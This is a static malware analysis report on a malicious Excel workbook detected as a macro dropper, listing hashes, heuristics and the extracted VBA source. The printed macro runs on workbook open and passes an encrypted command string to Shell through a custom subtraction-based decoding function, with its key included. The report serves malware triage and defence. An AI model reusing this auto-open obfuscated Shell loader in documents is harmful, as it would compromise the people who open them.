Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ae26246a4c3c3ea3…

MALICIOUS

Office (OOXML)

128.7 KB Created: 2020-11-01 22:23:15 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-11-05
MD5: 7514caa14878e148d8e9305a51756fcd SHA-1: ddfadff6d2d1e5c740d95cd0f46baf8c781a62fb SHA-256: ae26246a4c3c3ea310b44afd90d15b9f4c79071a94311def0ce28afd26d6bb1a
148 Risk Score

Heuristics 4

  • ClamAV: Xls.Dropper.Generic-9823786-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-9823786-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv("§±»d†´dÁÆÈ©¶Ê¬¼½°q ¿©»„³¹»©´Ëq—½Ê¸¼¾rŸ¼År›¼¦š½­¶ÅÅmr›³Î¿°À¸µŠ­Ã© x¬ÅËÁ~s†©Ï´©½»À««Ðr»µ²Ä…¿©¸†u‹ ©É¼xph¼²Í‹…ÁÇ•¥¸¸o~­†Â¯�’r¼¼¼xmŒ Ÿ©»„“¹»©´Ëqq§Æ±w¤¬¶Ã½r…Ǵú§²Ëº³²€rª¹©½Ã–¼©º¹Ë¶lu¼¿º~˜´Ç•¥Å¸|k ™µ¯�’ ¼É©k€", "qddwdwqdqw")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Public Sub Workbook_Open()

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2264 bytes
SHA-256: 8f8fbdde4e0d689752837e310bd41038be2b8963cba2844f0871b3fddf791343
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Sub Workbook_Open()
'shell LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv(§±»d†´dÁÆÈ©¶Ê¬¼½°q ¿©»„³¹»©´Ëq—½Ê¸¼¾rŸ¼År›¼¦š½­¶ÅÅmr›³Î¿°À¸µŠ­Ã© x¬ÅËÁ~s†©Ï´©½»À««Ðr»µ²Ä…¿©¸†u‹ ©É¼xph¼²Í‹…ÁÇ•¥¸¸o~­†Â¯�’r¼¼¼xmŒ Ÿ©»„“¹»©´Ëqq§Æ±w¤¬¶Ã½r…Ǵú§²Ëº³²€rª¹©½Ã–¼©º¹Ë¶lu¼¿º~˜´Ç•¥Å¸|k ™µ¯�’ ¼É©k€)
Shell LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv("§±»d†´dÁÆÈ©¶Ê¬¼½°q ¿©»„³¹»©´Ëq—½Ê¸¼¾rŸ¼År›¼¦š½­¶ÅÅmr›³Î¿°À¸µŠ­Ã© x¬ÅËÁ~s†©Ï´©½»À««Ðr»µ²Ä…¿©¸†u‹ ©É¼xph¼²Í‹…ÁÇ•¥¸¸o~­†Â¯�’r¼¼¼xmŒ Ÿ©»„“¹»©´Ëqq§Æ±w¤¬¶Ã½r…Ǵú§²Ëº³²€rª¹©½Ã–¼©º¹Ë¶lu¼¿º~˜´Ç•¥Å¸|k ™µ¯�’ ¼É©k€", "qddwdwqdqw")
End Sub
    Private Function LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv(strText As String, ByVal strPwd As String)
        Dim i As Integer, c As Integer
        Dim strBuff As String
#If Not CASE_SENSITIVE_PASSWORD Then
        strPwd = UCase$(strPwd)
#End If
        If Len(strPwd) Then
            For i = 1 To Len(strText)
                c = Asc(Mid$(strText, i, 1))
                c = c - Asc(Mid$(strPwd, (i Mod Len(strPwd)) + 1, 1))
                strBuff = strBuff & Chr(c And &HFF)
            Next i
        Else
            strBuff = strText
        End If
        LiBNzdTBHTqVTJYlrctSZpsyKKxKaJIoTYsLzxtSPpzkYdbThWPUiQv = strBuff
    End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 14336 bytes
SHA-256: b3e26c56382b846a0b47c22cd532188de74f9bcbbf00a07ce21554ce3d26c1a8